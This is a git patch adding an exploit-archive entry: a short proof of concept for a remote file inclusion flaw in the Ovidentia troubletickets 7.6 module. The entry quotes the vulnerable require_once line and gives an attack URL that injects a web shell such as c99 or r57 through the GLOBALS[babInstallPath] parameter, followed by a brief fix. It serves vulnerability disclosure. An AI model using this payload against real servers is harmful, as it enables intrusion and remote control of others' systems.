From 95ea5e17e0f45a1c21aac2e3f675645c2474e0dd Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 13 Apr 2016 05:03:50 +0000 Subject: [PATCH] DB: 2016-04-13 1 new exploits Ovidentia troubleticketsModule 7.6 - Remote File Inclusion --- files.csv | 1 + platforms/php/webapps/39688.txt | 24 ++++++++++++++++++++++++ 2 files changed, 25 insertions(+) create mode 100755 platforms/php/webapps/39688.txt diff --git a/files.csv b/files.csv index daa431661..1edb6b361 100755 --- a/files.csv +++ b/files.csv @@ -35907,3 +35907,4 @@ id,file,description,date,author,platform,type,port 39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 +39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 diff --git a/platforms/php/webapps/39688.txt b/platforms/php/webapps/39688.txt new file mode 100755 index 000000000..a5ee7669d --- /dev/null +++ b/platforms/php/webapps/39688.txt @@ -0,0 +1,24 @@ +# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability +# Author: bd0rk || SCHOOL-OF-HACK.NET +# eMail: bd0rk[at]hackermail.com +# Website: http://www.school-of-hack.net +# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838 + +Proof-of-Concept: + +Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php'; + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE] + +The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once. + So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it. + It's no problem to patch it! + Declare this parameter or use an alert! + + +Greetings from bd0rk. HackThePlanet!